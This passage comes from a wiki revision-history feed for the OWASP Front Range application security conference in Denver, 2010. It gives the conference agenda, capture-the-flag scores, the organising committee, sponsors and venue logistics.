''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{| border=&amp;quot;3&amp;quot;&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
|'''1'''||'''mantis'''||'''4500'''||&lt;br /&gt;
|-&lt;br /&gt;
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''&lt;br /&gt;
|-&lt;br /&gt;
|'''3'''||'''jgimer'''||'''2300'''||&lt;br /&gt;
|-&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84408</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84408"/>
				<updated>2010-06-03T21:30:24Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
